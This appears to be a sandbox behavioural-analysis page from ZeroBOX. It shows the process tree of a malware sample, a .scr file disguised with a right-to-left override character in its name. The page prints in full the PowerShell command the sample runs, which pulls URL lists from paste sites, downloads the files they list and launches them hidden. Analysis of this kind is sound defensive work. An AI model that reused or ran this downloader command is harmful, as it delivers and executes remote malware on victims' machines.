| ZeroBOX

Behavioral Analysis

Process tree

  • injector%20resou%E2%80%AEnls..scr "C:\Users\test22\AppData\Local\Temp\injector%20resou%E2%80%AEnls..scr"

    2544
    • powershell.exe "powershell.exe" powershell -Command "function Generate-RandomString { param([int]$length); $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; $random = New-Object System.Random; $randomString = -join ((1..$length) | ForEach-Object { $chars[$random.Next(0, $chars.Length)] }); return $randomString }; $slnUrls = (Invoke-WebRequest -Uri 'https://textbin.net/raw/2pdhkh5nhy').Content -split \"`n\"; foreach ($slnUrl in $slnUrls) { $slnData = Invoke-WebRequest -Uri $slnUrl -Method Get -UseBasicParsing; $randomString = Generate-RandomString -length 10; $filePath = Join-Path -Path $env:TEMP -ChildPath (\"$randomString.sln\"); [System.IO.File]::WriteAllBytes($filePath, $slnData.Content); Start-Process -FilePath $filePath }; $exeUrls = (Invoke-WebRequest -Uri 'https://rentry.co/MuckLw/raw').Content -split \"`n\"; foreach ($exeUrl in $exeUrls) { $exeData = Invoke-WebRequest -Uri $exeUrl -Method Get -UseBasicParsing; $randomString = Generate-RandomString -length 10; $filePath = Join-Path -Path $env:TEMP -ChildPath (\"$randomString.exe\"); [System.IO.File]::WriteAllBytes($filePath, $exeData.Content); Start-Process -FilePath 'cmd.exe' -ArgumentList \"/c $filePath\" -WindowStyle Hidden }"

      2612

Process contents

No process loaded Click on a process in the tree above to load its data.